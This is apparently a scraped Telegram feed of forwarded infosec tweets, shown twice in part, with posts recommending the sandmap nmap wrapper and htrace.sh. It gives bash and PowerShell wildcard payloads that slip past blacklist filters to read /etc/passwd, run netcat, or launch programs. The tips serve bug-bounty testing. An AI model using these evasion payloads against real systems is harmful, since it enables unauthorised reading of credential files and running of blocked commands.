#Protip can somebody read your passwd file with: "/???/?at /???/????w?" ? yes.
bypass blacklisted words filter (or firewalls) via bash wildcards.
/b'i'n/c'a't /e't'c/p'a's's'w'd'
/???/?at /???/????w?
/usr/b'i'n/'n'c 2130706433 80
/???/???/n? 2130706433 80
#BugBounty #infosec https://t.co/M35RHcBuAN
Check out @omespino’s Tweet: https://twitter.com/omespino/status/999229294286077954?s=09
bypass blacklisted words filter (or firewalls) via bash wildcards.
/b'i'n/c'a't /e't'c/p'a's's'w'd'
/???/?at /???/????w?
/usr/b'i'n/'n'c 2130706433 80
/???/???/n? 2130706433 80
#BugBounty #infosec https://t.co/M35RHcBuAN
Check out @omespino’s Tweet: https://twitter.com/omespino/status/999229294286077954?s=09
Посмотрите, о чем твитнул(а) @omespino: https://twitter.com/omespino/status/1082361280248336384?s=09
Twitter
Omar Espino
#Protip can you pop a calc with "C:\>powershell C:\*\*2\n??e*d.*?" ? yes. bypass blacklisted words filter (or firewalls) via wildcards C:\>powershell C:\??*?\*3?\c?lc.?x? calc C:\>powershell C:\*\*2\n??e*d.* notepad C:\>powershell C:\*\*2\t?s*r.* taskmgr…
Forwarded from Патчкорд
Обёртка для nmap - sandmap. Уже приготовленный
nmap
для разных задач, плюс интерактивный командный интерфейс, чтобы не помнить все 100500 опций и скриптов. Забирать с GitHub, там же есть помощь на Wiki.Forwarded from Патчкорд
Удобная и красивая обёртка для отладки и профилирования
Может достаточно много, чтобы смело себе добавить в копилку с универсальными инструментами.
HTTP/HTTPS
- htrace.sh.Может достаточно много, чтобы смело себе добавить в копилку с универсальными инструментами.
Twitter
Pilot Pirx
https://t.co/ToYs3gK3FY (Swiss Army knife for http/https troubleshooting and profiling) new version available! Minor improvements and fixes, support for nghttp2, and Nmap NSE Vulscan. https://t.co/m3Y4GVedD8 #it #tech #infosec #Security #CyberSecurity #Nmap…